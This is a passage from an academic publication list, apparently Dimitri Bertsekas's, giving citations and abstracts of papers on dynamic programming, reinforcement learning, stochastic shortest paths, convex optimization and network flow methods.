Q-Learning Algorithms,\" Report LIDS-P-2433, Lab. for Info. and Decision Systems, 1998; SIAM J. on Control and Optimization, Vol. 41, 2002, pp. 1-22.\n\nAbstract: We discuss synchronous and asynchronous variants of fixed point iterations of the form x^{k+1} = x^k + \\gamma(k) \\bl(F(x^k,w^k)-x^k\\br), where F is a non-expansive mapping under a suitable norm, and {w^k} is a stochastic sequence. These are stochastic approximation iterations that can be analyzed using the ODE approach based either on Kushner and Clark's Lemma for the synchronous case or Borkar's Theorem for the asynchronous case. However, the analysis requires that the iterates {x^k} are bounded, a fact which is usually hard to prove. We develop a novel framework for proving boundedness, which is based on scaling ideas and properties of Lyapunov functions. We then combine the boundedness property with Borkar's stability analysis of ODE's involving non-expansive mappings to prove convergence with probability 1. We also apply our convergence analysis to Q-learning algorithms for stochastic shortest path problems and we are able to relax some of the assumptions of the currently available results.\n\n• S. D. Patek and D. P. Bertsekas, \"Stochastic Shortest Path Games,\" SIAM J. on Control and Optimization, Vol. 36, 1999, pp. 804-824.\n\nAbstract: We consider dynamic, two-player, zero-sum games where the \"minimizing\" player seeks to drive an underlying finite-state dynamic system to a special terminal state along a least expected cost path. The \"maximizer\" seeks to interfere with the minimizer's progress so as to maximize the expected total cost. We consider, for the frst time, undiscounted finite-state problems, with compact action spaces, and transition costs that are not strictly positive. We admit that there are policies for the minimizer which permit the maximizer to prolong the game indefinitely. Under assumptions which generalize deterministic shortest path problems, we establish (i) the existence of a real-valued equilibrium cost vector achievable with stationary policies for the opposing players and (ii) the convergence of value iteration and policy iteration to the unique solution of Bellman's equation.\n\n• D. P. Bertsekas, \"A New Value Iteration Method for the Average Cost Dynamic Programming Problem,\" SIAM J. on Control and Optimization, Vol. 36, 1998, pp. 742-759.\n\nAbstract: We propose a new value iteration method for the classical average cost Markovian Decision problem, under the assumption that all stationary policies are unichain and furthermore there exists a state that is recurrent under all stationary policies. This method is motivated by a relation between the average cost problem and an associated stochastic shortest path problem. Contrary to the standard relative value iteration, our method involves a weighted sup norm contraction and for this reason it admits a Gauss-Seidel implementation. Computational tests indicate that the Gauss-Seidel version of the new method substantially outperforms the standard method for difficult problems.\n\n• D. P. Bertsekas, \"Differential Training of Rollout Policies,\" Proc. of the 35th Allerton Conference on Communication, Control, and Computing, Allerton Park, Ill., October 1997.\n\nAbstract: We consider the approximate solution of stochastic optimal control problems using a neuro-dynamic programming/reinforcement learning methodology. We focus on the computation of a rollout policy, which is obtained by a single policy iteration starting from some known base policy and using some form of exact or approximate policy improvement. We indicate that, in a stochastic environment, the popular methods of computing rollout policies are particularly sensitive to simulation and approximation error, and we present more robust alternatives, which aim to estimate relative rather than absolute Q-factor and cost-to-go values. In particular, we propose a method, called differential training, that can be used to obtain an approximation to cost-to-go differences rather than cost-to-go values by using standard methods such as TD(lambda) and lambda-policy iteration. This method is suitable for recursively generating rollout policies in the context of simulation-based policy iteration methods.\n\n• D. P. Bertsekas, J. N. Tsitsiklis, and C. Wu, \"Rollout Algorithms for Combinatorial Optimization,\" J. of Heuristics, Vol. 3, 1997, pp. 245-262.\n\nAbstract: We consider the approximate solution of discrete optimization problems using procedures that are capable of magnifying the effectiveness of any given heuristic algorithm through sequential application. In particular, we embed the problem within a dynamic programming framework, and we introduce several types of rollout algorithms, which are related to notions of policy iteration. We provide conditions guaranteeing that the rollout algorithm improves the performance of the original heuristic algorithm. The method is illustrated in the context of a machine maintenance and repair problem.\n\n• D. P. Bertsekas and S. Ioffe, \"Temporal Differences-Based Policy Iteration and Applications in Neuro-Dynamic Programming,\" Report LIDS-P-2349, Lab. for Information and Decision Systems, MIT, 1996.\n\nAbstract: We consider a new policy iteration method for dynamic programming problems with discounted and undiscounted cost. The method is based on the notion of temporal differences, and is primarily geared to the case of large and complex problems where the use of approximations is essential. We develop the theory of these methods without approximation, we describe how to embed them within a neuro-dynamic programming/reinforcement learning context where feature-based approximation architectures are used, we relate them to TD(Lambda) methods, and we illustrate their use in the training of a tetris playing program.\n\n• L. C. Polymenakos, D. P. Bertsekas, and J. N. Tsitsiklis, \"Efficient Algorithms for Continuous-Space Shortest Path Problems,\" IEEE Transactions on Automatic Control, Vol. 43, 1998, pp. 278-283.\n\nAbstract: We consider a continuous-space shortest path problem in a two-dimensional plane. This is the problem of finding a trajectory that starts at a given point, ends at the boundary of a compact set, and minimizes a cost function of the form $\\int_0^Tr(x(t))dt+q(x(T)).$ For a discretized version of this problem, a Dijkstra-like method that requires one iteration per discretization point has been developed by Tsitsiklis. Here we develop some new label correcting-like methods based on the Small Label First methods of Bertsekas. We prove the finite termination of these methods, and we present computational results showing that they are competitive and often superior to the Dijkstra-like method, and are also much faster than the traditional Jacobi and Gauss-Seidel methods.\n\n• S. D. Patek and D. P. Bertsekas,\"Play Selection in American Football: a Case Study in Neuro-Dynamic Programming\", Chapter 7 in Advances in Computational and Stochastic Optimization, Logic Programming, and Heuristic Search: Interfaces in Computer Science and Operations Research, David L. Woodruff, editor. Kluwer Academic Publishers, Boston, 1997.\n\nAbstract: We present a computational case study of neuro-dynamic program- ming, a recent class of reinforcement learning methods. We cast the problem of play selection in American football as a stochastic shortest path Markov Decision Problem (MDP). In particular, we consider the problem faced by a quarterback in attempting to maximize the net score of an offensive drive. The resulting optimization problem serves as a medium-scale testbed for numerical algorithms based on policy iteration. The algorithms we consider evolve as a sequence of approximate policy eval- uations and policy updates. An (exact) evaluation amounts to the computation of the reward-to-go function associated with the policy in question. Approxi- mations of reward-to-go are obtained either as the solution or as a step toward the solution of a training problem involving simulated state/reward data pairs. Within this methodological framework there is a great deal of flexibility. In specifying a particular algorithm, one must select a parametric form for esti- mating the reward-to-go function as well as a training algorithm for tuning the approximation. One example we consider, among many others, is the use of a multilayer perceptron (i.e. neural network) which is trained by backpropaga- tion. The objective of this paper is to illustrate the application of neuro-dynamic programming methods in solving a well-defined optimization problem. We will contrast and compare various algorithms mainly in terms of performance, al- though we will also consider complexity of implementation. Because our version of football leads to a medium-scale Markov decision problem, it is possible to compute the optimal solution numerically, providing a yardstick for meaningful comparison of the approximate methods.\n\n• B. Van Roy, D. P. Bertsekas, Y. Lee, and J. N. Tsitsiklis, \"A Neuro-Dynamic Programming Approach to Retailer Inventory Management,\" Proceedings of the IEEE Conference on Decision and Control, 1997; this is an extended version which appeared as a Lab. for Information and Decision Systems Report, MIT, Nov. 1996.\n\nAbstract: We present a model of two-echelon retailer inventory systems, and we cast the problem of generating optimal control strategies into the framework of dynamic programming. We formulate two specific case studies for which the underlying dynamic programming problems involve thirty three and forty six state variables, respectively. Because of the enormity of these state spaces, classical algorithms of dynamic programming are inapplicable. To address these complex problems we develop approximate dynamic programming algorithms. The algorithms are motivated by recent research in artificial intelligence involving simulation-based methods and neural network approximations, and they are representative of algorithms studied in the emerging field of neuro-dynamic programming. We assess performance of resulting solutions relative to optimized s-type (\"order-up-to\" policies), which are generally accepted as reasonable heuristics for the types of problems we consider. In both case studies, we are able to generate control strategies substantially superior to the heuristics, reducing inventory costs by approximately ten percent.\n\n• D. P. Bertsekas, F. Guerriero, and R. Musmanno, \"Parallel Asynchronous Label Correcting Methods for Shortest Paths,\" J. of Optimization Theory and Applications, Vol. 88, 1996, pp. 297-320.\n\nAbstract: In this paper we develop parallel asynchronous implementations of some known and some new label correcting methods for finding a shortest path from a single origin to all the other nodes of a directed graph. We compare these implementations on a shared memory multiprocessor, the Alliant FX/80, using several types of randomly generated problems. Excellent (sometimes superlinear) speedup is achieved with some of the methods, and it is found that the asynchronous versions of these methods are substantially faster than their synchronous counterparts.\n\n• D. P. Bertsekas, \"Generic Rank One Corrections for Value Iteration in Markovian Decision Problems,\" Operations Research Letters, Vol. 17, 1995, pp. 111-119.\n\nAbstract: Given a linear iteration of the form $x:=F(x)$, we consider modified versions of the form $x:=F(x+\\g d)$, where $d$ is a fixed direction, and $\\g$ is chosen to minimize the norm of the residual $\\|x+\\g d-F(x+\\g d)\\|$. We propose ways to choose $d$ so that the convergence rate of the modified iteration is governed by the subdominant eigenvalue of the original. In the special case where $F$ relates to a Markovian decision problem, we obtain a new extrapolation method for value iteration. In particular, our method accelerates the Gauss-Seidel version of the value iteration method for discounted problems in the same way that MacQueen's error bounds accelerate the standard version. Furthermore, our method applies equally well to Markov Renewal and undiscounted problems.\n\n• D. P. Bertsekas, \"A Counterexample to Temporal Difference Learning,\" Neural Computation, Vol. 7, 1995, pp. 270-279.\n\nAbstract: Sutton's TD(lambda) method aims to provide a representation of the cost function in an absorbing Markov chain with transition costs. A simple example is given where the representation obtained depends on $\\l$. For $\\l=1$ the representation is optimal with respect to a least squares error criterion, but as $\\l$ decreases towards 0 the representation becomes progressively worse and, in some cases, very poor. The example suggests a need to understand better the circumstances under which TD(0) and Q-learning obtain satisfactory neural network-based compact representations of the cost function. A variation of TD(0) is also proposed, which performs better on the example.\n\n• D. P. Bertsekas and J. N. Tsitsiklis, \"An Analysis of Stochastic Shortest Path Problems,\" Mathematics of Operations Research, Vol. 16, 1991, pp. 580-595.\n\nAbstract: We consider a stochastic version of the classical shortest path problem whereby for each node of a graph, we must choose a probability distribution over the set of successor nodes so as to reach a certain destination node with minimum expected cost. The costs of transition between successive nodes can be positive as well as negative. We prove natural generalizations of the standard results for the deterministic shortest path problem, and we extend the corresponding theory for undiscounted finite state Markovian decision problems by removing the usual restriction that costs are either all nonnegative or all nonpositive.\n\n• D. P. Bertsekas and D. A. Castanon, \"Adaptive Aggregation Methods for Infinite Horizon Dynamic Programming,\" IEEE Transactions on Aut. Control, Vol. 34, 1989, pp. 589-598.\n\nAbstract: We propose a class of iterative aggregation algorithms for solving infinite horizon dynamic programming problems. The idea is to interject aggregation iterations in the course of the usual successive approximation method. An important new feature that sets our method apart from earlier proposals is that the aggregate groups of states change adaptively from one aggregation iteration to the next, depending on the progress of the computation. This allows acceleration of convergence in difficult problems involving multiple ergodic classes for which methods using fixed groups of aggregate states are ineffective. No knowledge of special problem structure is utilized by the algorithms.\n\n• D. P. Bertsekas, \"Distributed Dynamic Programming,\" IEEE Transactions on Aut. Control, Vol. AC-27, 1982, pp. 610-616.\n\nAbstract: We consider distributed algorithms for solving dynamic programming problems whereby several processors participate simultaneously in th computation while maintaining coordination by information exchange via communication links. A model of asynchronous distributed computation is developed which requires very weak assumptions on the ordering of computations,the timing of information exchange,the amount of local information needed at each computation node, and the initial condition for the algorithm. the class of problems considered is very broad and includes shortest path problems, and finite and infinite horizon stochastic optimal control problems. When specialized to the shortest path problem, the algorithm reduces to the algorithm originally implemented for routing messages in the internet.\n\n• D. P. Bertsekas, and S. E. Shreve \"Existence of Optimal Stationary Policies in Deterministic Optimal Control,\" J. of Math Analysis and Applications, Vol. 69, 1979, pp. 607-620.\n\nAbstract: This paper considers deterministic discrete-time optimal control problems over an infinite horizon involving a stationary system and a nonpositive cost per stage. Various results are provided relating to existence of an epsilon-optimal stationary policy, and existence of an optimal stationary policy assuming an optimal policy exists.\n\n• S. E. Shreve, and D. P. Bertsekas, \"Alternative Theoretical Frameworks for Finite Horizon Discrete-Time Stochastic Optimal Control,\" SIAM J. on Control and Optimization, Vol. 16, 1978, pp. 953-978.\n\nAbstract: Stochastic optimal control problems are usually analyzed under one of three types of assumptions: a) Countability assumptions on the underlying probability space - this eliminates all difficulties of measure theoretic nature; b) Semicontinuity assumptions under which the existence of optimal Borel measurable policies can be guaranteed; and c) Borel measurability assumptions under which the existence of p-optimal or p-epsilon-optimal Borel measurable policies can be guaranteed (Blackwell, Strauch). In this paper, we introduce a general theoretical framework based on outer integration which contains these three models as special cases. Within this framework all known results for finite horizon problems together with some new ones are proved and subsequently specialized. An important new feature of our specialization to the Borel measurable model is the introduction of universally measurable policies. We show that everywhere optimal or nearly optimal policies exist within this class and this enables us to dispense with the notion of p-optimality.\n\n• D. P. Bertsekas, \"Monotone Mappings with Application in Dynamic Programming,\" SIAM J. on Control and Optimization, Vol. 15, 1977, pp. 438-464; a version from the Proceedings of the 1975 IEEE Conference on Decision and Control, Houston, TX: \"Monotone Mappings in Dynamic Programming.\"\n\nAbstract: The structure of many sequential optimization problems over a finite or infinite horizon can be summarized in the mapping that defines the related dynamic programming algorithm. In this paper, we take as a starting point this mapping and obtain results that are applicable to a broad class of problems. This approach has also been taken earlier by Denardo under contraction assumptions. The analysis here is carried out without contraction assumptions and thus the results obtained can be applied, for example, to the positive and negative dynamic programming models of Blackwell and Strauch. Most of the existing results for these models are generalized and several new results are obtained relating mostly to the convergence of the dynamic programming algorithm and the existence of optimal stationary policies.\n\n• D. P. Bertsekas, \"Convergence of Discretization Procedures in Dynamic Programming,\" IEEE Transactions on Aut. Control, June 1975, pp. 415-419.\n\nAbstract: The computational solution of discrete-time stochastic optimal control problems by dynamic programming requires, in most cases, discretization of the state and control spaces whenever these spaces are infinite. In this short paper we consider a discretization procedure often employed in practice. Under certain compactness and Lipschitz continuity assumptions we show that the solution of the discretized algorithm converges to the solution of the continuous algorithm, as the discretization grid becomes finer and finer. Furthermore, any control law obtained from the discretized algorithm results in a value of the cost functional which converges to the optimal value of the problem.\n\n• D. P. Bertsekas, \"Linear Convex Stochastic Control Problems Over an Infinite Horizon,\" IEEE Transactions on Aut. Control, Vol. AC-18, 1973, pp. 314-315.\n\nAbstract: A stochastic control problem over an infinite horizon which involves a linear system and a convex cost functional is analyzed. We prove the convergence of the dynamic programming algorithm associated with the problem, and we show the existence of a stationary Borel measurable optimal control law. The approach used illustrates how results on infinite time reachability can be used for the analysis of dynamic programming algorithms over an infinite horizon subject to state constraints.\n\n• D. P. Bertsekas, \"Control of Uncertain Systems with a Set-Membership Description of the Uncertainty,\" Ph.D. Thesis, Dept. of Electrical Engineering, M.I.T., 1971.\n\nAbstract: The problem of optimal feedback control of uncertain discrete-time dynamic systems is considered, where the uncertain quantities do not have a stochastic description but instead they are known to belong to given sets. The problem is converted to a sequential minimax problem and dynamic programming is suggested as a general method for its solution. The notion of a sufficiently informative function, which parallels the notion of a sufficient statistic of optimal control is introduced, and the possible decomposition of the optimal controller into an estimator and an actuator is demonstrated. Some special cases involving a linear system are further examined. A problem involving a convex cost functional and perfect state information for the controller is considered in detail. Particular attention is given to a special case, the problem of reachability of a target tube, and an ellipsoidal approximation algorithm is obtained which leads to linear control laws. State estimation problems are also examined, and some algorithms are derived which offer distinct advantages over existing estimation schemes. These algorithms are subsequently used in the solution of some reachability problems with imperfect state information for the controller.\n\n• D. P. Bertsekas, \"Proximal Algorithms and Temporal Differences for Large Linear Systems: Extrapolation, Approximation, and Simulation,\" Lab. for Information and Decision Systems Report LIDS-P-3205, MIT, October 2016. (Related Lecture Slides), a version appears in Computational Optimization and Applications J, Vol. 70, 2018, pp. 709-736. (Related Video Lecture). In this paper we consider large linear fixed point problems and solution with proximal algorithms. We show that, under certain assumptions, there is a close connection between proximal iterations, which are prominent in numerical analysis and optimization, and multistep methods of the temporal difference type such as TD(lambda), LSTD(lambda), and LSPE(lambda), which are central in simulation-based approximate dynamic programming. As an application of this connection, we show that we may accelerate the standard proximal algorithm by extrapolation towards the multistep iteration, which generically has a faster convergence rate. We also use the connection with multistep methods to integrate into the proximal algorithmic context several new ideas that have emerged in the approximate dynamic programming context. In particular, we consider algorithms that project each proximal iterate onto the subspace spanned by a small number of basis functions, using low-dimensional calculations and simulation, and we discuss various algorithmic options from approximate dynamic programming.\n\n• D. P. Bertsekas, \"Incremental Aggregated Proximal and Augmented Lagrangian Algorithms,\" Lab. for Information and Decision Systems Report LIDS-P-3176, MIT, June 2015. Incorporated into the author's book \"Nonlinear Programming,\" 3rd edition, Athena Scientific, 2016. (Related Video Lecture) . We consider minimization of the sum of a large number of convex functions, and we propose an incremental aggregated version of the proximal algorithm, which bears similarity to the incremental aggregated gradient and subgradient methods that have received a lot of recent attention. Under cost function differentiability and strong convexity assumptions, we show linear convergence for a sufficiently small constant stepsize. We then consider dual versions of incremental proximal algorithms, which are incremental augmented Lagrangian methods for separable constrained optimization problems. Contrary to the standard augmented Lagrangian method, these methods admit decomposition in the minimization of the augmented Lagrangian. The incremental aggregated augmented Lagrangian method also bears similarity to several known decomposition algorithms, which, however, are not incremental in nature: the alternating direction method of multipliers (ADMM), the Stephanopoulos and Westerberg algorithm [StW75], and the related methods of Tadjewski [Tad89] and Ruszczynski [Rus95].\n\n• M. Wang and D. P. Bertsekas, \"Stochastic First-Order Methods with Random Constraint Projection,\" SIAM Journal on Optimization, 2016, Vol. 26, pp. 681-717. (Related Lecture Slides) (Related Video Lecture) .\n\nWe consider convex optimization problems with structures that are suitable for sequential treatment or online sampling. In particular, we focus on problems where the objective function is an expected value, and the constraint set is the intersection of a large number of simpler sets. We propose an algorithmic framework for stochastic first-order methods using random projection/proximal updates and random constraint updates, which contain as special cases several known algorithms as well as many new algorithms. To analyze the convergence of these algorithms in a unified manner, we prove a general coupled convergence theorem. It states that the convergence is obtained from an interplay between two coupled processes: progress toward feasibility and progress toward optimality. Under suitable stepsize assumptions, we show that the optimality error decreases at a rate of O(1/ \\sqrt{k}) and the feasibility error decreases at a rate of O(log k/k). We also consider a ?number of typical sampling processes for generating stochastic first-order information and random constraints, which are common in data-intensive applications, online learning, and simulation optimization. By using the coupled convergence theorem as a modular architecture, we are able to analyze the convergence of stochastic algorithms that use arbitrary combinations of these sampling processes.\n\n• M. Wang and D. P. Bertsekas, \"Incremental Constraint Projection Methods for Variational Inequalities,\" Lab. for Information and Decision Systems Report LIDS-P-2898, MIT, December 2012; Mathematical Programming, Vol. 150, 2015, pp. 321-363. We consider the solution of strongly monotone variational inequalities of the form $F(x^*)'(x-x^*)\\geq 0$, for all $x\\in X$. We focus on special structures that lend themselves to sampling, such as when $X$ is the intersection of a large number of sets, and/or $F$ is an expected value or is the sum of a large number of component functions. We propose new methods that combine elements of incremental constraint projection and stochastic gradient. We analyze the convergence and the rate of convergence of these methods with various types of sampling schemes, and we establish a substantial rate of convergence advantage for random sampling over cyclic sampling.\n\n• D. P. Bertsekas, \"Incremental Proximal Methods for Large Scale Convex Optimization,\" Mathematical Programming, Vol. 129, 2011, pp.163-195. (Related Lecture Slides). (Related Video Lecture) .\n\nAbstract: We consider the minimization of a sum $\\sum_{i=1}^mf_i(x)$ consisting of a large number of convex component functions $f_i$. For this problem, incremental methods consisting of gradient or subgradient iterations applied to single components have proved very effective. We propose new proximal versions of incremental methods, consisting of proximal iterations applied to single components, as well as combinations of gradient, subgradient, and proximal iterations. We provide a convergence and rate of convergence analysis of a variety of such methods, including some that involve randomization in the selection of components. We also discuss applications in various contexts, including signal processing and inference/machine learning.\n\n• D. P. Bertsekas, \"Centralized and Distributed Newton Methods for Network Optimization and Extensions,\" Lab. for Information and Decision Systems Report LIDS-P-2866, MIT, April 2011.\n\nAbstract: We consider Newton methods for common types of single commodity and multi-commodity network flow problems. Despite the potentially very large dimension of the problem, they can be implemented using the conjugate gradient method and low-dimensional network operations, as shown nearly thirty years ago. We revisit these methods, compare them to more recent proposals, and describe how they can be implemented in a distributed computing system. We also discuss generalizations, including the treatment of arc gains, linear side constraints, and related special structures.\n\n• D. P. Bertsekas and H. Yu, \"A Unifying Polyhedral Approximation Framework for Convex Optimization,\" Lab. for Information and Decision Systems Report LIDS-P-2820, MIT, September 2009 (revised December 2010), published in SIAM J. on Optimization, Vol. 21, 2011, pp. 333-360. (Related VideoLecture, Dec. 2008) (Related Lecture Slides)\n\nAbstract: We propose a unifying framework for polyhedral approximation in convex optimization. It subsumes classical methods, such as cutting plane and simplicial decomposition, but also includes new methods, and new versions/extensions of old methods, such as a simplicial decomposition method for nondifferentiable optimization, and a new piecewise linear approximation method for convex single commodity network flow problems. Our framework is based on an extended form of monotropic programming, a broadly applicable model, which includes as special cases Fenchel duality and Rockafellar's monotropic programming, and is characterized by an elegant and symmetric duality theory. Our algorithm combines flexibly outer and inner linearization of the cost function. The linearization is progressively refined by using primal and dual differentiation, and the roles of outer and inner linearization are reversed in a mathematically equivalent dual algorithm. We provide convergence results and error bounds for the general case where outer and inner linearization are combined in the same algorithm.\n\n• A. Nedich and D. P. Bertsekas, \"The Effect of Deterministic Noise in Subgradient Methods,\" Math. Programming, Ser. A, Vol. 125, pp. 75-99, 2010.\n\nAbstract: In this paper, we study the influence of noise on subgradient methods for convex constrained optimization. The noise may be due to various sources, and is manifested in inexact computation of the subgradients. Assuming that the noise is deterministic and bounded, we discuss the convergence properties for two cases: the case where the constraint set is compact, and the case where this set need not be compact but the objective function has a sharp set of minima (for example the function is polyhedral). In both cases, using several different stepsize rules, we prove convergence to the optimal value within some tolerance that is given explicitly in terms of the subgradient errors. In the first case, the tolerance is nonzero, but in the second case, somewhat surprisingly, the optimal value can be obtained exactly, provided the size of the error in the subgradient computation is below some threshold. We then extend these results to objective functions that are the sum of a large number of convex functions, in which case an incremental subgradient method can be used.\n\n• Yu, H., Bertsekas, D. P., and Rousu, J., An Efficient Discriminative Training Method for Generative Models,\" Extended Abstract, the 6th International Workshop on Mining and Learning with Graphs (MLG), 2008.\n\nAbstract: We propose an efficient discriminative training method for generative models under supervised learning. In our setting, fully observed instances are given as training examples, together with a specification of variables of interest for prediction. We formulate the training as a convex programming problem, incorporating the SVM-type large margin constraints to favor parameters under which the maximum a posteriori (MAP) estimates of the prediction variables, conditioned on the rest, are close to their true values given in the training instances. The resulting optimization problem is, however, more complex than its quadratic programming (QP) counterpart resulting from the SVM-type training of conditional models, because of the presence of non-linear constraints on the parameters. We present an efficient optimization method, which combines several techniques, namely, a data-dependent reparametrization of dual variables, restricted simplicial decomposition, and the proximal point algorithm. Our method extends the one for solving the aforementioned QP counterpart, proposed earlier by some of the authors.\n\n• D. P. Bertsekas, \"Extended Monotropic Programming and Duality,\" Lab. for Information and Decision Systems Report 2692, MIT, March 2006, corrected in Feb. 2010; a version appeared in JOTA, 2008, Vol. 139, pp. 209-225.\n\nAbstract: We consider the separable problem of minimizing $\\sum_{i=1}^mf_{i}(x_{i})$ subject to $x\\in S$, where $x_i$ are multidimensional subvectors of $x$, $f_i$ are convex functions, and $S$ is a subspace. Monotropic programming, extensively studied by Rockafellar, is the special case where the subvectors $x_i$ are the scalar components of $x$. We show a strong duality result that parallels Rockafellar's result for monotropic programming, and contains other known and new results as special cases. The proof is based on the use of $\\e$-subdifferentials and the $\\e$-descent method, which is used here as an analytical vehicle.\n\n• D. P. Bertsekas, and P. Tseng, \"Set Intersection Theorems and Existence of Optimal Solutions,\" Lab. for Information and Decision Systems Report 2628, MIT, Nov. 2004; revised August 2005; Math. Programming J., Vol. 110, 2007 pp. 287-314.\n\nAbstract: The question of nonemptiness of the intersection of a nested sequence of closed sets is fundamental in a number of important optimization topics, including the existence of optimal solutions, the validity of the minimax inequality in zero sum games, and the absence of a duality gap in constrained optimization. We introduce the new notion of an asymptotic direction of a sequence of closed sets, and the associated notions of retractive, horizon, and critical directions, and we provide several conditions that guarantee the nonemptiness of the corresponding intersection. We show how these conditions can be used to obtain simple proofs of some known results on existence of optimal solutions, and to derive some new results, including an extension of the Frank-Wolfe Theorem for (nonconvex) quadratic programming. (Related Slide Presentation)\n\n• D. P. Bertsekas, \"Lagrange Multipliers with Optimal Sensitivity Properties in Constrained Optimization,\" Lab. for Information and Decision Systems Report 2632, MIT, October 2004; in Proc. of the 2004 Erice Workshop on Large Scale Nonlinear Optimization, Erice, Italy, Kluwer, 2005.\n\nWe consider optimization problems with inequality and abstract set constraints, and we derive sensitivity properties of Lagrange multipliers under very weak conditions. In particular, we do not assume uniqueness of a Lagrange multiplier or continuity of the perturbation function. We show that the Lagrange multiplier of minimum norm defines the optimal rate of improvement of the cost per unit constraint violation. (Related Slide Presentation), (Related Slide Presentation)\n\n• D. P. Bertsekas, A. E. Ozdaglar, and P. Tseng, \"Enhanced Fritz John Conditions for Convex Programming,\" Lab. for Information and Decision Systems Report 2631, MIT, July 2004; SIAM J. on Optimization, Vol. 16, 2006, p. 766.\n\nAbstract: We consider convex constrained optimization problems, and we enhance the classical Fritz John optimality conditions to assert the existence of multipliers with special sensitivity properties. In particular, we prove the existence of Fritz John multipliers that are informative in the sense that they identify constraints whose relaxation, at rates proportional to the multipliers, strictly improves the primal optimal value. Moreover, we show that if the set of geometric multipliers is nonempty, then the minimum-norm vector of this set is informative, and defines the optimal rate of cost improvement per unit constraint violation. Our assumptions are very general, and do not include the absence of duality gap or the existence of optimal solutions. In particular, for the case where there is a duality gap, we establish enhanced Fritz John conditions involving the dual optimal value and dual optimal solutions. (Related Slide Presentation)\n\n• A. E. Ozdaglar and D. P. Bertsekas, \"The Relation Between Pseudonormality and Quasiregularity in Constrained Optimization,\" Optimization Methods and Software, Vol. 19 (2004), pp. 493--506.\n\nAbstract: We consider optimization problems with equality, inequality, and abstract set constraints. We investigate the relations between various characteristics of the constraint set that imply the existence of Lagrange multipliers. For problems with no abstract set constraint, the classical condition of quasiregularity provides the connecting link between the most common constraint qualifications and existence of Lagrange multipliers. In earlier work, we introduced a new and general condition, pseudonormality, that is central within the theory of constraint qualifications, exact penalty functions, and existence of Lagrange multipliers. In this paper, we explore the relations between pseudonormality, quasiregularity, and existence of Lagrange multipliers in the presence of an abstract set constraint. In particular, under a regularity assumption on the abstract constraint set, we show that pseudonormality implies quasiregularity. However, contrary to pseudonormality, quasiregularity does not imply the existence of Lagrange multipliers, except under additional assumptions.\n\n• A. E. Ozdaglar and D. P. Bertsekas, \"Optimal Solution of Integer Multicommodity Flow Problems with Application in Optical Networks,\" Proc. of Symposium on Global Optimization, Santorini, Greece, June 2003.\n\nAbstract: In this paper, we propose methods for solving broadly applicable integer multicommodity flow problems. We focus in particular on the problem of routing and wavelength assignment (RWA), which is critically important for increasing the efficiency of wavelength-routed all-optical networks. Our methodology can be applied as a special case to the problem of routing in a circuit-switched network. We discuss an integer-linear programming formulation, which can be addressed with highly efficient linear (not integer) programming methods, to obtain optimal or nearly optimal solutions. Note: A comparative computational evaluation of the methodology of this paper is given in the thesis by Ali Meli.\n\n• A. E. Ozdaglar and D. P. Bertsekas, \"Routing and Wavelength Assignment in Optical Networks,\" Report LIDS-P-2535, Dec. 2001; IEEE Trans. on Networking, no. 2, Apr. 2003, pp. 259-272.\n\nAbstract: The problem of routing and wavelength assignment (RWA) is critically important for increasing the efficiency of wavelength-routed all-optical networks. Given the physical network structure and the required connections, the RWA problem is to select a suitable path and wavelength among the many possible choices for each connection so that no two paths sharing a link are assigned the same wavelength. In work to date, this problem has been formulated as a difficult integer programming problem that does not lend itself to efficient solution or insightful analysis. In this work, we propose several novel optimization problem formulations that offer the promise of radical improvements over the existing methods. We adopt a (quasi-)static view of the problem and propose new integer-linear programming formulations, which can be addressed with highly efficient linear (not integer) programming methods and yield optimal or near-optimal RWA policies. The fact that this is possible is surprising, and is the starting point for new and greatly improved methods for RWA. Aside from its intrinsic value, the quasi-static solution method can form the basis for suboptimal solution methods for the stochastic/dynamic settings. Note: A comparative computational evaluation of the methodology of this paper is given in the thesis by Ali Meli.\n\n• D. P. Bertsekas and A. E. Ozdaglar, \"Pseudonormality and a Lagrange Multiplier Theory for Constrained Optimization,\" Report LIDS-P-2489, Nov. 2000; JOTA, Vol. 114, (2002), pp. 287--343.\n\nAbstract: We consider optimization problems with equality, inequality, and abstract set constraints, and we explore various characteristics of the constraint set that imply the existence of Lagrange multipliers. We prove a generalized version of the Fritz-John theorem, and we introduce new and general conditions that extend and unify the major constraint qualifications. Among these conditions, two new properties, pseudonormality and quasinormality, emerge as central within the taxonomy of interesting constraint characteristics. In the case where there is no abstract set constraint, these properties provide the connecting link between the classical constraint qualifications and two distinct pathways to the existence of Lagrange multipliers: one involving the notion of quasiregularity and Farkas' Lemma, and the other involving the use of exact penalty functions. The second pathway also applies in the general case where there is an abstract set constraint.(Related Slide Presentation)\n\n• P. Tseng and D. P. Bertsekas, \"An Epsilon-Relaxation Method for Separable Convex Cost Generalized Network Flow Problems,\" Math. Programming, Vol. 88, (2000), pp. 85--104.\n\nAbstract: We generalize the epsilon-relaxation method for the single commodity, linear or separable convex cost network flow problem to network flow problems with positive gains. The method maintains epsilon-complementary slackness at all iterations and adjusts the arc flows and the node prices so as to satisfy flow conservation upon termination. Each iteration of the method involves either a price change on a node or a flow change along an arc or a flow change along a simple cycle. Complexity bounds for the method are derived. For one implementation employing epsilon-scaling, the bound is polynomial in the number of nodes N, the number of arcs A, a certain constant Gamma depending on the arc gains, and ln(epsilon^0/\\bar epsilon), where epsilon^0 and \\bar epsilon denote, respectively, the initial and the final tolerance epsilon.\n\n• D. P. Bertsekas and A. E. Koksal-Ozdaglar, \"Enhanced Optimality Conditions and Exact Penalty Functions,\" Proc. of the 38th Allerton Conference on Communication, Control, and Computing, Allerton Park, Ill., September 2000.\n\nAbstract: We consider optimization problems with equality, inequality, and abstract set constraints, and we explore various characteristics of the constraint set that imply the existence of Lagrange multipliers. We prove a generalized version of the Fritz-John theorem, and we introduce new and general conditions that extend and unify the major constraint qualifications. Among these conditions, a new property, pseudonormality, provides the connecting link between the classical constraint qualifications and the use of exact penalty functions. (Related Slide Presentation)\n\n• A. Nedic and D. P. Bertsekas, \"Incremental Subgradient Methods for Nondifferentiable Optimization,\" Report LIDS-P-2460, Dec. 2000, SIAM J. on Optimization, Vol. 12, 2001, pp. 109-138.\n\nAbstract: We consider a class of subgradient methods for minimizing a convex function that consists of the sum of a large number of component functions. This type of minimization arises in a dual context from Lagrangian relaxation of the coupling constraints of large scale separable problems. The idea is to perform the subgradient iteration incrementally, by sequentially taking steps along the subgradients of the component functions, with intermediate adjustment of the variables after processing each component function. This incremental approach has been very successful in solving large differentiable least squares problems, such as those arising in the training of neural networks, and it has resulted in a much better practical rate of convergence than the steepest descent method.\n\n• A. Nedic, D. P. Bertsekas, and V. Borkar, Distributed Asynchronous Incremental Subgradient Methods, Proceedings of the March 2000 Haifa Workshop 